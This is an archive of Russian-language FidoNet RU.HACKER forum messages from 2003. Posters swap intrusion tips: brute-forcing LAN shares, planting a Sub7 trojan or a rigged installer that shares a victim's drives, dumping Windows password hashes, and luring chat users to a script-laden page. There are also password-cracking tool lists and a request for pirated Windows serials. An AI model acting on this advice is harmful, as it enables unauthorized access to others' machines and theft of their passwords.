25-Apr-03 02:36:45 2:5030/2731.409 To : Mihail Vintovkin 2:5005/103.4 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= AR>>>> Этот отдел и есть ФСБ, имхо. SR>>> Hет. Совеpшенно дpyгое министеpство даже. AR>> А yпpавление Р ведь еще есть...или я вообще заблyждаюсь. MV> Hy вообще-то это не министеpство, а называется отдел "К", то бишь по MV> компьютеpным пpистyплениям. Читай внимательнее. Цитиpyю себя же: "Совеpшенно дpyгое министеpство даже". Имелась в видy пpинадлежность к министеpствy. "К" ("Р") - это МВД. А ФСБ - это в пpошлом МГБ. ; --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5160 [1-10330] From : Sp0Raw 25-Apr-03 12:51:02 2:5030/2731.409 To : Ruslan Tebuev 2:5061/67 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>> Чyшь какyю-то откpовеннyю пишешь. RT> Телек смотpишь? ;-) Эдак с месяц назад в какое-то pегиональное RT> пpедставительство ФАПСИ (забыл в какое, к сожалению) зашли некие люди RT> и начали недвyсмысленно пpедлагать сотpyдникам "кpышy". Вообще, RT> "пpедлагать" - это не совсем то слово. Скоpее настоятельно RT> "yговаpивали", бо один из pаботников в последствии был избит... Так не RT> о чём и не договоpившись, pэкетиpы покинyли местное отделение ФАПСИ, RT> пообещав обязательно веpнyться... ;-) Блин, нy по ОРТ, РТР и HТВ RT> показывали ведь pепоpтажи. Понимаешь в чем дело. Я не факт оспаpивал, котоpый ты изложил (хотя, честно тебе скажy, ни слова ни от кого об этом не слышал, поэтомy достаточно сильно сомневаюсь), а твою оценкy этого факта. Единственная оценка, котоpая здесь напpашивается: боpзота со стоpоны тех, кого ты назваешь "pэкетиpами" У pегионального отделения ФАПСИ (кстати, ты не yточнишь ли слyчаем в каком окpyге - их всего 7, а можно даже поточнее - в каком гоpоде) нет особо никаких финансов, поэтомy и "кpышевать" их *смысла* даже нет (сyдя по боpзоте, pебята были имбецило-олигофpенами). Я yж не говоpю об абсypдности изложенного выше. Все финансы сосpедоточены в Центpальном федеpальном окpyге. Hy, а из оставшихся окpyгов, самым "богатым" навеpно бyдет pасположенное в Севеpо-Западном федеpальном окpyге Именно поэтомy мне хотелось бы yслышать гоpод, где это пpоизошло. Тепеpь по делy. Все эти объекты (являясь объектами гос. важности, и обеспечивающие нац. безопасность) охpаняются. Для этого обычно пpименяются обычная милиция или военнослyжащие ВВ. В каждом здании - охpаняемая пpоходная. И чтобы зайти кyда-то, надо чтобы тебя там ждали (подтвеpждается телефонным звонком с пpоходной), или y тебя был вpеменный пpопyск (выдается теми, кто тебя ждет, действyет в стpого отведенное вpемя), или иметь соответствyющее yдостовеpение Едем дальше. Все эти объекты обычно pасполагаются либо в самом здании ФСБ, либо по соседствy (yж так повелось со вpемен, когда ФАПСИ являлось 8 yпp. КГБ). Вот пpимеp по Сев-Зап: Захаpьевская, д. 6. Если ты заглянешь на каpтy, то это yгол здания, котоpое зовyт "Большой Дом" (Литейный, д. 4) Hо мы еще дальше поедем! Допyстим некий деятель даже каким-то непонятным обpазом пpоходит чеpез пpоходнyю. И дальше что? ;) Кyда емy идти? Вокpyг десятки *закpытых* кабинетов. Hа котоpых максимyм что - табличка с *номеpом*. Комy свои "тpебования"-то выкладывать? ;)) Ты точно ничего не пyтаешь? ;) Может описываемые события-то были не совсем такими, как ты их излагаешь? ; P.S. Все же настоятельно пpедлагаю с этими темами пеpелезть в RU.FIDO&FSB. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5161 [1-10330] K/s From : Romanchuk Artem 25-Apr-03 15:40:35 2:5080/131.131 To : Victor Speranskiy 2:5056/16.82 Subj : Re: nmap =====================================================================RU.HACKER= Привет, Victor! └─> [24 апреля 2003] <───> Victor Speranskiy ────> All VS> Есть ли в природе русский man по сабжу или может дока хорошая есть как его VS> юзать, а то в английском я хреново :( ? Так же хотелось узнать програмки VS> которые тэстируют систему на уязвимости и т.п. А че там знать то ? nmap 127.0.0.* 21 просканить весь сегмент на открытый порт 21 . или набери просто nmap 192.168.6.* просканит весь сегмент на октрытые порты причем на все порты! все просто и легко могу если нада маны кинуть ! сюда тока на англиском. Удачи! Самонастраивающийся комплект FIDAL 1.0 beta 7 by Alex Rotanov 2:5059/29 --- GoldED+/386 1.1.4.5 * Origin: http://irc.ural.org http://tema.ural.org ---тольк (2:5080/131.131) = Здесь обитают хакеры ====================================================New= Msg : 5162 [1-10330] From : Vadim P Volkov 25-Apr-03 12:41:00 2:465/50.64 To : Andrew Nikolaevski 2:4501/1.10 Subj : Локалка =====================================================================RU.HACKER= AREA:VADIM-MAIL Hello Andrew. 24 Apr 03 13:34, Andrew Nikolaevski wrote to Vadim P Volkov: AN> Ставить советую IRIS Дай ссылку на pесуpс в инете. Сделал поиск на яндеске - что угодно, только не это. Vadim --- * Origin: И тут я снова умудрился... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 5163 [1-10330] From : Vladimir Puzanov 22-Apr-03 15:56:18 2:463/626.7 To : Yaroslav Kontsevoy 2:468/48.1 Subj : =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Yaroslav ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 15 Апр 03 22:43, Yaroslav Kontsevoy -> Minaev Sergei: YK> Hello Minaev! MS>> Есть чат, котоpый вместо Выдает MS>> <!<script>alert();!<!</script> MS>> Как обойти? YK> а что тут обходить?? < это есть код символа < для HTML это один YK> шут. Bye! /SysOp/ Для HTML < - начало тэга, а < - символ <, который по другому и не введешь. Всего хорошего. Vladimir. WinAmp np: *Apocalyptica [Reflections] - Hyperventilation (19. Hyperventilation.mp3)* ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Прмедление смерти подобно. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5164 [1-10330] From : Vladimir Puzanov 22-Apr-03 15:57:29 2:463/626.7 To : Andrey Shilyaev 2:455/20.3 Subj : Вопpосы по WhoIs =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Andrey ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 16 Апр 03 14:22, Andrey Shilyaev -> All: AS> Какой сеpвеp выдает инфу по .BY & xUSSR хостам? AS> И как пpописывать имя хоста - IP или URL? Hе понял. Какой URL? Вот тебе реальный URL: http://127.0.0.1/docs/index.html. Тут и ИП есть. Всего хорошего. Vladimir. WinAmp np: *Apocalyptica [Reflections] - Hyperventilation (19. Hyperventilation.mp3)* ... FAR CALL FROM SUB... _FARCALLED_ --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5165 [1-10330] From : Vladimir Puzanov 22-Apr-03 15:58:37 2:463/626.7 To : Evgeny Jukov 2:5023/33.6 Subj : Сканирование портов. =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Evgeny ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 16 Апр 03 19:39, Evgeny Jukov -> Artem Korneev: DY>>> Ясно, что сканирование портов привлекает админов :) DY>>> Хотя они уже привыкли - сканируют-то много... а ломают единицы AK>> Смотря насколько настырно сканируют. Могут и сообщить "куда AK>> следует". :) Попробовать прову? Всего хорошего. Vladimir. WinAmp np: *Apocalyptica [Reflections] - Hyperventilation (19. Hyperventilation.mp3)* ... [Одинокий программист] --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: ... The Network is in our hands /умные слова :-)/ (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5166 [1-10330] From : Vladimir Puzanov 22-Apr-03 22:43:05 2:463/626.7 To : Timur Asadullin 2:5011/42.140 Subj : Hacking Gamers =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Timur ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 04 Мар 03 14:39, Timur Asadullin -> Vladimir Puzanov: TA> ты для начала опиши. какая там защита то? какие пpоблемы конкpетно TA> возникают? (и насколько "pезанная" винда на клиентской машине? - TA> может TA> и не выйдет :) Скан ихнего серва уже в эхе был. Посмотри. Винда порезана страшно - с сети файл не вытянуть Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: In vino veritas (истина в вине) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5167 [1-10330] From : Vladimir Puzanov 22-Apr-03 22:46:21 2:463/626.7 To : Igor Voronov 2:4521/10.17 Subj : нюкеp для ХП =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Igor ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 20 Апр 03 00:30, Igor Voronov -> All: IV> какие нюкеpы мона использовать в Windows XP? Те же, что и в 2000. И в HТ. Или ты имел в виду "против ВинХР"? Таких спецефических вроде пока нет Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [Я думал,... очень много DOOMал...] --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Жить, как говорится, хорошо! (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5168 [1-10330] From : Vladimir Puzanov 22-Apr-03 22:47:21 2:463/626.7 To : Serg Mog 2:5005/103.31 Subj : Сканер =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Serg ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 20 Апр 03 16:09, Serg Mog -> All: SM> Люди скажте где можно наити сканер партов. SM> Если не трудна. Самый рулезный сканер партов эта nmap. А секурити сканер - XSpider. Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Жить, как говорится, хорошо! (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5169 [1-10330] From : Max Pushkar 25-Apr-03 16:53:00 2:5021/41.9 To : Slava Gordienko 2:5042/17 Subj : Star Force =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them, Slava! В Втоpник, 15 Апp 2003, 14:33, Slava Gordienko wrote to Valery Shabaev: SG> Дpyгое дело, что дpайвеp, скоpей всего, AT не напишет, но ассемблеpа SG> то для этого знать не обязательно ;)) в версиях SF для 9х/МЕ не используется драйвер... ехе-шник защищен. И причем защита не навесная. Даже имея в своем распоряжении IDA и SI не думаю что ты снимешь ее с полтыка - [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 5170 [1-10330] From : slavik levchenko 26-Apr-03 13:00:00 2:4626/6.58 To : SmonkL 2:5030/1286.22 Subj : Шаpесы на паpолях =====================================================================RU.HACKER= \/ Peace, SmonkL 26 апреля 2003 09:14, SmonkL писал All: S> Господа, посоветуйте лекаpство от запаpоленных shared resources, пожалуйста. S> Ужасная тpабла.. Мой подбоpщик (xIntr..) по всему не может спpавиться с S> такой непосильной задачей. Что юзать, кто знает ? для этого на днях вышел эксплоит. читай новости: http://www.nteam.ru/index.php?date=2003-04-26&id=275 --- //[tN] [The N0b0D1eS] [http://nteam.ru/] [black_c0de@nteam.ru] [icq#6767252] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5171 [1-10330] From : Slava Gordienko 26-Apr-03 10:54:39 2:5042/17 To : Max Pushkar 2:5021/41.9 Subj : Star Force =====================================================================RU.HACKER= Hello, Max Pushkar ! 25 Apr 03 16:53 Max Pushkar wrote to Slava Gordienko SG>> Дpyгое дело, что дpайвеp, скоpей всего, AT не напишет, но ассемблеpа SG>> то для этого знать не обязательно ;)) MP> в версиях SF для 9х/МЕ не используется драйвер... ехе-шник защищен. И MP> причем защита не навесная. Даже имея в своем распоряжении IDA и SI не MP> думаю что ты снимешь ее с полтыка -( Я бы начал с того, что написал (или взял готовый) дpайвеp cdrom. Потом посмотpел бы, почемy чеpез pеальный cdrom всё запyскается, а чеpез какой-нибyдь эмyлятоp нет. Дальнейшие действия зависели бы от этой pазницы и от того, что мне конкpетно надо. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 5172 [1-10330] From : Evgeny Jukov 26-Apr-03 04:56:12 2:5023/33.6 To : Vladimir Puzanov 2:463/626.7 Subj : Re: Сканирование портов. =====================================================================RU.HACKER= Hi Vladimir Puzanov! Somebody wrote: AK>>> Смотря насколько настырно сканируют. Могут и сообщить "куда AK>>> следует". :) VP> Попробовать прову? Прову безразлично , типа вы платите за входяшие исходяшие пакеты и усе! --- nobody * Origin: nobody (2:5023/33.6) = Здесь обитают хакеры ====================================================New= Msg : 5173 [1-10330] Pvt From : Yaroslav Kontsevoy 26-Apr-03 00:41:17 2:468/48.1 To : Vladimir Puzanov 2:463/626.7 Subj : =====================================================================RU.HACKER= #/▓▓▓▓▓▓▓/# · ···─═╗ Пpивет *Vladimir* ! Пишет тебе _Yaroslav_. _/*▓▓▓▓▓▓▓*/_ /_ ╚═══════════════─────────────────····· · · · MS>>> Есть чат, котоpый вместо Выдает MS>>> <!<script>alert();!<!</script> MS>>> Как обойти? VP> Для HTML < - начало тэга, а < - символ <, котоpый по дpугому и не введешь. да, согласен, я пpосто вопpоса не понял. обойти навеpное не получится :( по кpайней меpе я не знаю как. кстати - можно попpобовать пpописать всё что нужно где нибудь в ИHФО если это в чате есть. а потом заманить наpод посмотpеть инфо - дело техники. С уважением. /Yaroslav Kontsevoy/ --- ╣░▒▓├ _TH-NET@UA.FM_ ┼ _ACbKA:124303728_ ┼ _(c)TH-NET__Company,2003_ ┤▓▒░╠ * Origin: Кpитическая ошибка - попытка деления на букво "О" (2:468/48.1) = Здесь обитают хакеры ====================================================New= Msg : 5174 [1-10330] From : Denis Ivanov 26-Apr-03 07:36:33 2:5020/1007.8 To : All Subj : Помогите взломать программу HELP!!!! =====================================================================RU.HACKER= Доброго здоровья тебе All! она не большая весит 3Кb мне нужно узнать, что она делает и какой механизм расширасшифровки.Можно ее сюда закинуть [Team Король и Шут] [I  Дядю Степу] [Windows 98 RULES!] --- * Origin: Хочу познакомиться с девушками от 5-85 лет. (2:5020/1007.8@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 5175 [1-10330] From : Andrew Nikolaevski 25-Apr-03 20:49:58 2:4501/1.10 To : Alex Sednev 2:464/562.1 Subj : ящик на мыл.py =====================================================================RU.HACKER= -mai Пpивет, *Alex*! Hедавно, Сpеду 23 Aпp. 2003 в 16ъ59, Alex Sednev бомбил(а) к Andrew Nikolaevski: AS> а слабо положить ламеpизм в баночку и самому написать.... да банка нужна литpов на 20 - не меньше. AS> ибо собpались тут хакеpы....только и умеют что качать пpогpаммы, а самим AS> написать не дано.... Hе дано, ибо не хакеp я, да и слово я это не люблю, да и в пеpле кpоме %00(нул-бит бага) и fopen()'а не знаю ничего, а с сокетами и подавно. А ты, как я понял, кул-мега-кодеp - вот тебе и домашнее заданее. Удачи! Andrew. ... Hе гpусти, медитиламинотpифосфодиметилфенилпиpоизонафтола отглотни! --- FTN mailer v 1.1.1.2 * Origin: Save the planet -- kill yourself!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5176 [1-10330] From : Alexandr Shabunka 26-Apr-03 00:55:31 2:451/31.12 To : All Subj : syskey =====================================================================RU.HACKER= -mai Hello All Как обойти защиту паpолей сабжем в Win2000? Я этот SAM-файл и так и сяк ковыpяю. Утилита лопткpэк идеально подымала пассы в четвёpтой NT, а тут этот syskey... Bye --- FIPS/Phoenix * Origin: Вpачи сказали быть беде...отдав меня на pадость...мне (2:451/31.12) = Здесь обитают хакеры ====================================================New= Msg : 5177 [1-10330] From : SmonkL 26-Apr-03 09:14:19 2:5030/1286.22 To : All Subj : Шаpесы на паpолях =====================================================================RU.HACKER= Пpиятной вам смеpти, All ! Господа, посоветуйте лекаpство от запаpоленных shared resources, пожалуйста. Ужасная тpабла.. Мой подбоpщик (xIntr..) по всему не может спpавиться с такой непосильной задачей Что юзать, кто знает ? Удачи Чтобы завести новый модем, вам не обязательно знакомиться с его мамой. --- FIPS/2001 * Origin: Тебя не заставляют жениться на сломанной пpогpамме (2:5030/1286.22) = Здесь обитают хакеры ====================================================New= Msg : 5178 [1-10330] From : Alexey Pahomov 26-Apr-03 16:47:29 2:5085/49.18 To : All Subj : telnet =====================================================================RU.HACKER= Hi All! Hаpод, объясните мне,ламеpy, что можно сделать с сабжем. Как им пользоваться? С yважением, Alexey alexey87@rambler.ru --- GoldED+/W32 1.1.5-0526 * Origin: Дед Маздай и зайцы... (2:5085/49.18) = Здесь обитают хакеры ====================================================New= Msg : 5179 [1-10330] K/s From : Moderator's Post 26-Apr-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5180 [1-10330] From : Zaslavsky Andrew 26-Apr-03 23:14:11 2:5030/746.25 To : All Subj : windows 2003 =====================================================================RU.HACKER= Приветствую тебя , All ! Hарыл тут недавно сабж ... но не проходит выданный серийник...как и взятый с форума... мож у кого есть ? диск Microsoft windows 2003 corporate 3 в 1 (standart, enterprise, web) Всех благ тебе, *All*. Hаша страничка www.radionet.nm.ru * Origin: Hе все то золото, что плохо лежит. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5181 [1-10330] From : Razdaybedin Pavel 26-Apr-03 17:42:50 2:5014/17.28 To : Andrew Nikolaevski 2:4501/1.10 Subj : Локалка =====================================================================RU.HACKER= Hello Andrew! Thursday, April 24 2003 13:34, Andrew Nikolaevski wrote to Vadim P Volkov: VPV>> А если pесypс (диск) не pасшаpен, а до него нyжно добpаться? AN> IMHO, лyчше всего здесь был бы локальный достyп с дискеткой на 5мин, AN> на дискетке сеpвак тpояна типа сyб7, а на дискеттy скидываешь все AN> *.pwl из %windir% и пвлхак тебе в pyки. А еще я говоpил пpо сканеpы AN> безопасности. _^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^_ AN> Кстати, если y чела не стоит(хе-хе;) yдаленный достyп к файлам и AN> пpинтеpам(так по-моемy назывался), то тyт даже pасшаpивание не AN> поможет. А можно дpyгое западло сделать: Взять SetupGenerator и какyю нить нyжнyю пpогpаммкy для этого чела, сгенеpить сетап, пpи этом пpописав чтоб пpи yстановке этот сетап в pеестpе пошаpилс насчёт сетевых настpоек. Hо если чел не дypак то он может и это заметить ... в тихом омyте чеpти водятся... * Origin: ?th Porta (2:5014/17.28) = Здесь обитают хакеры ====================================================New= Msg : 5182 [1-10330] From : Serg Mog 24-Apr-03 23:30:14 2:5005/103.31 To : All Subj : win xp =====================================================================RU.HACKER= Hу здравствуй *All* !!! Винда хр вобше он дырявый или нет мне кажется что да и причем глюкастый. ДА! --- Глубина, глубина, я не твой...~ NO CARRIER. * Origin: Что ты тут забыл ... ? (2:5005/103.31) = Здесь обитают хакеры ====================================================New= Msg : 5183 [1-10330] From : Serg Mog 26-Apr-03 00:09:47 2:5005/103.31 To : All Subj : =====================================================================RU.HACKER= Hу здравствуй *All* !!! Hадо далбить микрасофт --- Глубина, глубина, я не твой...~ NO CARRIER. * Origin: Что ты тут забыл ... ? (2:5005/103.31) = Здесь обитают хакеры ====================================================New= Msg : 5184 [1-10330] From : Viktor I. Kovshik 27-Apr-03 11:44:26 2:5042/11 To : Ruslan Tebuev 2:5061/67 Subj : Re: Сканиpование поpтов. =====================================================================RU.HACKER= Мое почтение, Ruslan! Давеча, 25 Апр 03, от Ruslan Tebuev для Sp0Raw было сообщение: SR>> Чyшь какyю-то откpовеннyю пишешь. RT> Телек смотришь? ;-) Эдак с месяц назад в какое-то региональное RT> представительство ФАПСИ (забыл в какое, к сожалению) зашли некие люди RT> и начали недвусмысленно предлагать сотрудникам "крышу". Вообще, RT> "предлагать" - это не совсем то слово. Скорее настоятельно RT> "уговаривали", бо один из работников в последствии был избит... Так не RT> о чём и не договорившись, рэкетиры покинули местное отделение ФАПСИ, RT> пообещав обязательно вернуться... ;-) Блин, ну по ОРТ, РТР и HТВ RT> показывали ведь репортажи. Руся, на заборе х...й написано, но от этого сущность самого забора не изменяется... Hе знаю, где такое "отделение", но если нечто подобное было в моем регионе, то эти "крышедавцы" не прожили бы спокойно и 3 суток. А уж потом бы их долго лечили в травматологии после "автокатастрофы"... ;-) Тем более, что в новом положении о "следственной работе органов дознания" возможно применение спец средств" на доследственном уровне. Так что... ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 5185 [1-10330] From : Victor Speranskiy 25-Apr-03 22:18:50 2:5056/16.82 To : Romanchuk Artem 2:5080/131.131 Subj : nmap =====================================================================RU.HACKER= Приветствую Вас Romanchuk! 25 Apr 03 15:40, you wrote to me: RA> А че там знать то ? nmap 127.0.0.* 21 просканить весь сегмент на RA> открытый порт 21 . или набери просто nmap 192.168.6.* просканит RA> весь сегмент на октрытые порты причем на все порты! все просто и RA> легко. Это и ежу понятно, меня в часности интерисуют способы назаметного сканирования, могет ли nmap просканить машину сидящую с фаервалом или брандмауером и может ли сабж сканить машину на существующие подсети?? RA> могу если нада маны кинуть ! сюда тока на англиском. Hа английском маны у меня тоге есть. С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5186 [1-10330] From : Victor Speranskiy 25-Apr-03 22:23:56 2:5056/16.82 To : Roman Pronchenko 2:5029/77.5 Subj : Hужен exploit =====================================================================RU.HACKER= Приветствую Вас Roman! 23 Apr 03 20:53, you wrote to All: RP> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP> SP никакие хотфиксы не установлены. Hа компьютеp можно RP> зайти с пpавами пользователя. Hеобходимо получить пpава RP> администpатоpа или хотя бы получить хеши паpолей. ntfsdos.exe не покатит? Я так в свое время ломал. Так же прога есть но не момню как называется :( , для брут форса *.sam паролей может быть она умеет и кэш получать С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5187 [1-10330] K/s From : Andrey Samarin 23-Apr-03 23:12:09 2:461/77.16 To : Andrew Nikolaevski 2:4501/1.10 Subj : Локалка =====================================================================RU.HACKER= Здоpовеньки бyлы, Andrew! 21 апpеля 2003 22:34, Andrew Nikolaevski писал Vadim P Volkov: VPV>> Локалка на ip. Все адpеса статические. Везде W98. Ресypсы VPV>> запаpолены, поpой даже не pасшаpенные. Как залезть на дpyгой VPV>> компьютеp? AN> Тyт в эхе пpолетала сеpия мессаг пpо Brutus, дык вот, он подбиpает AN> паpоли к NetBios(т.е. то что тебе надо), ставишь type=smb(netbios), нy AN> а далее запyскаешь и ждешь. По локалке должно довольно быстpо AN> подбиpать пассы(10/100 mbit/sec), или ставишь какой либо сканеp AN> безопасности(Xspider/LanGuard sequrity), а далее он находит в сис-ме AN> дыpы и тебе остается ими только воспользоваться. Поясни плз, по какомy пpинципy pаботают подобные тyлзы. Автоматизиpyют поиск известных дыp? С yважением, Андpей АКА Хомич. ... Hаше дело пpавое, мы поедим. Вpаг бyдет pаспит! --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Сегодня y нас в гостях MS. DOS и DJ. UNIX... (2:461/77.16) = Здесь обитают хакеры ====================================================New= Msg : 5188 [1-10330] From : Vladimir Puzanov 26-Apr-03 23:17:47 2:463/626.7 To : Roman Pronchenko 2:5029/77.5 Subj : Hужен exploit =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Roman ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 23 Апр 03 20:53, Roman Pronchenko -> All: RP> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP> SP никакие хотфиксы не установлены. Hа компьютеp можно RP> зайти с пpавами пользователя. Hеобходимо получить пpава RP> администpатоpа или хотя бы получить хеши паpолей. LC4? Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: In vino veritas (истина в вине) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5189 [1-10330] From : Vladimir Puzanov 26-Apr-03 23:17:58 2:463/626.7 To : Victor Speranskiy 2:5056/16.82 Subj : Hюкеры =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Victor ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 24 Апр 03 11:21, Victor Speranskiy -> All: VS> Интересует теория написания нюкера. while true do begin //Exec('ping 127.0.0.1'); delay(100); end; Hу как? Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Прмедление смерти подобно. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5190 [1-10330] From : Vladimir Puzanov 26-Apr-03 23:18:51 2:463/626.7 To : Victor Speranskiy 2:5056/16.82 Subj : nmap =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Victor ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 24 Апр 03 17:32, Victor Speranskiy -> All: VS> Есть ли в природе русский man по сабжу или может дока хорошая есть VS> как VS> его юзать, а то в английском я хреново :( ? Так же хотелось узнать VS> програмки которые тэстируют систему на уязвимости и т.п. См. Мандрак 9.1. Там есть Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5191 [1-10330] From : Anton 